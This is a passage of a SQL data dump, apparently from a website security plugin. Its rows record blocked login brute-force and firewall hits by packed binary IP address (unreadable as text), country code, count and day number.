��','HK',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��e%�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��e%�','CN',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��e%�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�k','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g','MY',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gF','MY',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��g	��','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��g	��','VN',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��ge�','HK',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�&','IN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��g%�','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g*:f','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g*:f','VN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��g*:f','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g/<,','ID',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��g/<,','ID',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g3gI','ID',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g3gI','ID',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g3gI','ID',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g9��','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g9��','VN',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gL)','ID',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��gPR!','ID',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��gPR!','ID',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��gPR!','ID',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��gQW','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gQW','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gQW','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gQW','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��gR','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�j','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�[','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�[','VN',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��ge�Q','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��gk�s','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��gmш','ID',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��gmш','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gmш','ID',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��go(','ID',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��go(','ID',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��gx�V','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��gzj�','ID',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��gzj�','ID',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gzj�','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|^,','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|_Y','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|_h','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ڲ','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ڲ','VN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t2','ID',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t2','ID',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�p','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�p','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�p','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�p','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ʖ','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��R','BD',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��R','BD',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��8','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��8','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','BD',13,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','BD',5,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�|�','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�|�','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','ID',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','ID',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','ID',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�5f','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�5f','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�6�','',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�6�','',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\\X','',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\\X','',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gљ ','AU',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��gљ ','AU',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','SC',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','SC',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�y�','IN',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�>','IR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�>','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�>=','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�Y�','AU',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�z','VN',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�z','VN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\Z','ID',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\Z','ID',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','NZ',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�H�','HK',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��h%��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h-)-','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��h-)-','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�	�','US',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�DC','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�DC','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�f�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�f�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��.','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��.','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�o�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�w�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\0','BE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',4,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�P�','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�P�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��t','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��hƬD','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��hǒ','TW',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��hǒ','TW',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��hϒ�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�$�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�-�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�u','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�,','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�*d','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�*d','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',3,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��i9o','ZA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��i9o','ZA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��i9o','ZA',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��i9o','ZA',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��i�O','MA',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��j\\�','CN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��j)�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��j4��','CN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��j4��','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��j4��','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��j5s}','CN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��jK��','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�-:','US',2,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�-:','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�-:','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�.5','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�.6','US',4,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�0�','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�0�','US',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�4�','US',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�4�','US',4,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�4�','US',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�;�','US',2,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',4,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',3,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',4,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',4,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',4,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',4,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',4,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',4,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',4,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',4,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',6,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��z','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',2,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X�','US',4,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�g�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�g�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�g�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�g�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�i�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�i�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�i�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��k���','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��2','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��2','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','CA',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','CA',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��l��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��l�7�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��l�r','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��mW�','UA',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��mW�','UA',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��mꠙ','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��mꠙ','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��m���','RU',12,18873,'waf'),('\0\0\0\0\0\0\0\0\0\0��n-p','MY',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','AU',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','AU',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��o]8�','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��o]8�','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��o]8�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��o���','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��o���','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��o���','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��pJ�','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��pJ�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��pJ�','CN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��r��','ID',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��r!Z','TW',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��r!Z','TW',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��r!Z','TW',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>f�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>f�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��tv0�','VN',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��t�$','DE',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��tʡ�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��t�F�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��t˖G','DE',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��t˖G','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��t˖G','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��t���','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��t���','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��u�','VN',1,18860,'waf'),('\0\0\0\0\0\0\0\0\0\0��u,�','VN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��u2Z','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��vHh','CN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��vHh','CN',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��vHh','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��vHh','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��w4�','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��w4�','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��w4�','IN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��w`�;','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��x�@','NZ',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��y�_�','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��zrL�','CN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��zrL�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��z��','JP',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��{+�','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��{9�','CN',2,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��{��','ID',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�\n','VN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�\n','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�\n','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�f','MY',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��}�9','VN',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��}��','VN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����D�','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����}�','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����}�','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����}�','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���ǂ�','SG',1,18874,'br